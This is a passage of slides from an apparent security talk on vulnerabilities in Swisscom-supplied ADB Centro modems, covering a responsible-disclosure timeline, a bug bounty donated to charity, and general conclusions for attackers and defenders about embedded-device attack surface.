  • 36. 36Disclosure timeline › 9 September 2015 : Initial disclosure to Swisscom › 10 September 2015 : Vulnerabilities acknowledged by Swisscom › 11 September 2015 : Vendor notified (ADB) › 18 September 2015 : Confirmation of vulns & quick fix available › 24 September 2015 : Test of quick fix › 29 September 2015 : Contact with ADB › October 2015 : Rollout of quick fix to all devices › January 2016 : Status full fix : › Centro grande : 100 % › Centro Business 1.0 : 50 % › Centro Business 2.0 : 100 % › 13 June 2016 : Disclure
  • 37. 37Swisscom bounty › Combination of flaws rewarded with 3’000 CHF › Donated to the Ligue Vaudoise contre le Cancer › Swisscom Bug Bounty program is up & running › Talk is tomorrow afternoon :)
  • 38. 38Conclusions › Attackers › Look into other processes on the modem › miniupnp › voip › Embedded devices are found everywhere nowadays › Huge attack surface › Less people reversing firmwares than searching for XSS › Defenders › Consider 0days in your penetration tests › Test your defense in depth › Test your ability to detect breaches